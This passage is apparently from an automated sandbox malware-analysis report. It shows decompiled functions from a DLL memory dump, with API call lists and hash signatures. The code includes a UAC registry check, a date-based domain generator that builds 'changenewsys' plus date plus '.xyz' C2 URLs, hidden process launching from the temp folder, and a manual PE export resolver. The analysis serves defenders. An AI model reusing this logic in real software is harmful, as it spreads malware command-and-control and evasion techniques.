                                                                                                                                                      				}
                                                                                                                                                      				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296);
                                                                                                                                                      				E1000CF20(_t131, _v8, 0, _v296);
                                                                                                                                                      				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4));
                                                                                                                                                      				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                      				_t90 = _v296 + 2;
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
                                                                                                                                                      				_push(_v8);
                                                                                                                                                      				E1000CA30(_t101, _t131, _t132, _t90 % 3);
                                                                                                                                                      				return _v312;
                                                                                                                                                      			}

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen
                                                                                                                                                      • String ID: explorer$rundll32
                                                                                                                                                      • API String ID: 1975251954-2912785976
                                                                                                                                                      • Opcode ID: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                      • Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
                                                                                                                                                      • Opcode Fuzzy Hash: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                      • Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                      				struct _OSVERSIONINFOW _v284;
                                                                                                                                                      				char _v547;
                                                                                                                                                      				char _v548;
                                                                                                                                                      				char _v819;
                                                                                                                                                      				char _v820;
                                                                                                                                                      				char _v824;
                                                                                                                                                      				void* _t31;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t49;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      
                                                                                                                                                      				_t69 = __esi;
                                                                                                                                                      				_t68 = __edi;
                                                                                                                                                      				_t57 = __ebx;
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					return _t31;
                                                                                                                                                      				}
                                                                                                                                                      				_v820 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v819, 0, 0x103);
                                                                                                                                                      				_v548 = 0;
                                                                                                                                                      				_t58 =  &_v547;
                                                                                                                                                      				E1000CF20(_t68,  &_v547, 0, 0x103);
                                                                                                                                                      				_t65 =  &(_v284.dwMajorVersion);
                                                                                                                                                      				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
                                                                                                                                                      				_t74 = _t71 + 0x24;
                                                                                                                                                      				_v284.dwOSVersionInfoSize = 0x114;
                                                                                                                                                      				GetVersionExW( &_v284);
                                                                                                                                                      				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
                                                                                                                                                      					_t38 = E1001D7E0(_t68,  &_v548);
                                                                                                                                                      					_t75 = _t74 + 4;
                                                                                                                                                      					__eflags = _t38;
                                                                                                                                                      					if(_t38 != 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						E1001D2D0(_t58,  &_v548);
                                                                                                                                                      						_t65 =  &_v820;
                                                                                                                                                      						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
                                                                                                                                                      						_t77 = _t75 + 0x10;
                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                      						if(_t41 >= 0) {
                                                                                                                                                      							_t65 = 0x104 - _v824;
                                                                                                                                                      							__eflags = 0x104;
                                                                                                                                                      							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
                                                                                                                                                      							_t77 = _t77 + 0xc;
                                                                                                                                                      						}
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					_t49 = E1001D560(_t68,  &_v548);
                                                                                                                                                      					_t75 = _t75 + 4;
                                                                                                                                                      					__eflags = _t49;
                                                                                                                                                      					if(_t49 != 0) {
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      					_t58 =  &_v548;
                                                                                                                                                      					_t50 = E1001DA70(_t68,  &_v548);
                                                                                                                                                      					_t75 = _t75 + 4;
                                                                                                                                                      					__eflags = _t50;
                                                                                                                                                      					if(_t50 != 0) {
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      					_t65 =  &_v548;
                                                                                                                                                      					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
                                                                                                                                                      					_t77 = _t75 + 4;
                                                                                                                                                      					__eflags = _t51;
                                                                                                                                                      					if(_t51 == 0) {
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t53 = E1001DA70(_t68,  &_v548);
                                                                                                                                                      					_t77 = _t74 + 4;
                                                                                                                                                      					_t84 = _t53;
                                                                                                                                                      					if(_t53 != 0) {
                                                                                                                                                      						_t65 =  &_v548;
                                                                                                                                                      						E1001D2D0( &_v548,  &_v548);
                                                                                                                                                      						E1001D320(_t84,  &_v820,  &_v548);
                                                                                                                                                      						_t77 = _t77 + 0xc;
                                                                                                                                                      					}
                                                                                                                                                      					L13:
                                                                                                                                                      					if(_v820 == 0) {
                                                                                                                                                      						_t65 =  &_v820;
                                                                                                                                                      						E1001CFA0("Mid2Failed", 0x104,  &_v820);
                                                                                                                                                      						_t77 = _t77 + 0xc;
                                                                                                                                                      					}
                                                                                                                                                      					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
                                                                                                                                                      				}
                                                                                                                                                      			}
























                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                      • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                        • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                        • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                        • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                        • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                        • Part of subcall function 1001DA70: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                        • Part of subcall function 1001DA70: DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                        • Part of subcall function 1001DA70: CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                        • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                      • String ID: Mid2Failed
                                                                                                                                                      • API String ID: 2934472556-1001836097
                                                                                                                                                      • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                      • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                      			E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				struct _SYSTEMTIME _v36;
                                                                                                                                                      				char _v303;
                                                                                                                                                      				char _v304;
                                                                                                                                                      				char _v332;
                                                                                                                                                      				char _v360;
                                                                                                                                                      				char _v388;
                                                                                                                                                      				signed int _v392;
                                                                                                                                                      				intOrPtr _v396;
                                                                                                                                                      				intOrPtr _v400;
                                                                                                                                                      				intOrPtr _v404;
                                                                                                                                                      				intOrPtr _v408;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				intOrPtr _t91;
                                                                                                                                                      
                                                                                                                                                      				_t97 = __eflags;
                                                                                                                                                      				_t89 = __edi;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022A77);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t91;
                                                                                                                                                      				_v392 = 0;
                                                                                                                                                      				E10001160( &_v332, __eflags, "http://");
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v304 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v303, 0, 0x103);
                                                                                                                                                      				_v36.wYear = 0;
                                                                                                                                                      				_v36.wMonth = 0;
                                                                                                                                                      				_v36.wDay = 0;
                                                                                                                                                      				_v36.wMinute = 0;
                                                                                                                                                      				_v36.wMilliseconds = 0;
                                                                                                                                                      				GetLocalTime( &_v36);
                                                                                                                                                      				_push(_v36.wDay & 0x0000ffff);
                                                                                                                                                      				_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                      				E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
                                                                                                                                                      				_v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
                                                                                                                                                      				_v396 = E10001160( &_v360, _t97, _v20);
                                                                                                                                                      				_v400 = _v396;
                                                                                                                                                      				_v8 = 1;
                                                                                                                                                      				E10001A70( &_v332, _v400);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E100011A0( &_v360);
                                                                                                                                                      				_push(_v20);
                                                                                                                                                      				E1000CA30(__ebx, _t89, __esi, _t97);
                                                                                                                                                      				_v404 = E10001160( &_v388, _t97, ".xyz/");
                                                                                                                                                      				_v408 = _v404;
                                                                                                                                                      				_v8 = 2;
                                                                                                                                                      				E10001A70( &_v332, _v408);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E100011A0( &_v388);
                                                                                                                                                      				E10001110(_a4, _t97,  &_v332);
                                                                                                                                                      				_v392 = _v392 | 0x00000001;
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E100011A0( &_v332);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 10022624
                                                                                                                                                      • GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                      • _sprintf.LIBCMT ref: 10022666
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .xyz/$changenewsys%04d%02d%02d$http://
                                                                                                                                                      • API String ID: 984892819-377150047
                                                                                                                                                      • Opcode ID: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                      • Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
                                                                                                                                                      • Opcode Fuzzy Hash: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                      • Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v311;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v575;
                                                                                                                                                      				char _v576;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      
                                                                                                                                                      				_t50 = __eflags;
                                                                                                                                                      				_t41 = __edi;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022AF1);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t43;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v576 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                      				_v312 = 0;
                                                                                                                                                      				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                      				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
                                                                                                                                                      				GetTempPathA(0x104,  &_v576);
                                                                                                                                                      				_push(E100011E0( &_a4));
                                                                                                                                                      				_push("0011");
                                                                                                                                                      				_push(E100011E0( &_v44));
                                                                                                                                                      				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
                                                                                                                                                      				E1001A1D0(_t50,  &_v312);
                                                                                                                                                      				E100011A0( &_v44);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				_t30 = E100011A0( &_a4);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t30;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s %s %s$0011
                                                                                                                                                      • API String ID: 3552933064-2132516514
                                                                                                                                                      • Opcode ID: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction ID: 6384a0b866657e4047376afeeb64c65eb3b3c0e3c567da3335d1d9c995957fc0
                                                                                                                                                      • Opcode Fuzzy Hash: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction Fuzzy Hash: 7911B6B6C00248ABE714EB90DC96FDD7778EB04750F4041A4FA19661C1EB747B48CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A1D0(void* __eflags, CHAR* _a4) {
                                                                                                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                      				CHAR* _v24;
                                                                                                                                                      				struct _STARTUPINFOA _v100;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				E1000CF20(_t27,  &_v100, 0, 0x44);
                                                                                                                                                      				_v100.cb = 0x44;
                                                                                                                                                      				_v100.dwFlags = 1;
                                                                                                                                                      				_v100.wShowWindow = 0;
                                                                                                                                                      				E1000CF20(_t27,  &_v20, 0, 0x10);
                                                                                                                                                      				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
                                                                                                                                                      					CloseHandle(_v20.hThread);
                                                                                                                                                      					CloseHandle(_v20.hProcess);
                                                                                                                                                      					_v24 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _v24;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                      • _memset.LIBCMT ref: 1001A209
                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                      • String ID: D
                                                                                                                                                      • API String ID: 1151464618-2746444292
                                                                                                                                                      • Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
                                                                                                                                                      • Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                      				intOrPtr* _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr* _v36;
                                                                                                                                                      				intOrPtr* _v40;
                                                                                                                                                      				intOrPtr* _v44;
                                                                                                                                                      				intOrPtr* _t105;
                                                                                                                                                      				void* _t174;
                                                                                                                                                      				void* _t176;
                                                                                                                                                      
                                                                                                                                                      				_t172 = __edi;
                                                                                                                                                      				_t122 = __ebx;
                                                                                                                                                      				_v16 = _a4;
                                                                                                                                                      				_t4 = _v16 + 4; // 0x7d83ec45
                                                                                                                                                      				_v24 =  *_t4;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v20 =  *_v16 + 0x78;
                                                                                                                                                      				if( *((intOrPtr*)(_v20 + 4)) != 0) {
                                                                                                                                                      					_v8 = _v24 +  *_v20;
                                                                                                                                                      					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                                                                      						SetLastError(0x7f);
                                                                                                                                                      						return 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                                                                      							if( *(_v8 + 0x18) != 0) {
                                                                                                                                                      								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
                                                                                                                                                      									L19:
                                                                                                                                                      									_t70 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                      									_v28 = E1000DF58(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AA60);
                                                                                                                                                      									if(_v28 != 0) {
                                                                                                                                                      										_v12 =  *(_v28 + 4) & 0x0000ffff;
                                                                                                                                                      										L22:
                                                                                                                                                      										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                                                                      											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                                                                      										}
                                                                                                                                                      										SetLastError(0x7f);
                                                                                                                                                      										return 0;
                                                                                                                                                      									}
                                                                                                                                                      									SetLastError(0x7f);
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                                                                      								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                                                                      								_t105 = L1000CE56(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
                                                                                                                                                      								_t176 = _t174 + 4;
                                                                                                                                                      								_v44 = _t105;
                                                                                                                                                      								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
                                                                                                                                                      								if(_v44 != 0) {
                                                                                                                                                      									_v32 = 0;
                                                                                                                                                      									while(_v32 <  *(_v8 + 0x18)) {
                                                                                                                                                      										 *_v44 = _v24 +  *_v36;
                                                                                                                                                      										 *((short*)(_v44 + 4)) =  *_v40;
                                                                                                                                                      										_v32 = _v32 + 1;
                                                                                                                                                      										_v36 = _v36 + 4;
                                                                                                                                                      										_v40 = _v40 + 2;
                                                                                                                                                      										_v44 = _v44 + 8;
                                                                                                                                                      									}
                                                                                                                                                      									_t66 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                      									E1000D9D0( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AA90);
                                                                                                                                                      									_t174 = _t176 + 0x10;
                                                                                                                                                      									goto L19;
                                                                                                                                                      								}
                                                                                                                                                      								SetLastError(0xe);
                                                                                                                                                      								return 0;
                                                                                                                                                      							}
                                                                                                                                                      							SetLastError(0x7f);
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                                                                      							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      							goto L22;
                                                                                                                                                      						}
                                                                                                                                                      						SetLastError(0x7f);
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				SetLastError(0x7f);
                                                                                                                                                      				return 0;
                                                                                                                                                      			}
















                                                                                                                                                      0x1001b046
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b046
                                                                                                                                                      0x1001afcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001afd1
                                                                                                                                                      0x1001af6e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af74
                                                                                                                                                      0x1001af39
                                                                                                                                                      0x1001af5b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af5b
                                                                                                                                                      0x1001af3d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af43
                                                                                                                                                      0x1001af01
                                                                                                                                                      0x1001aee2
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1452528299-0
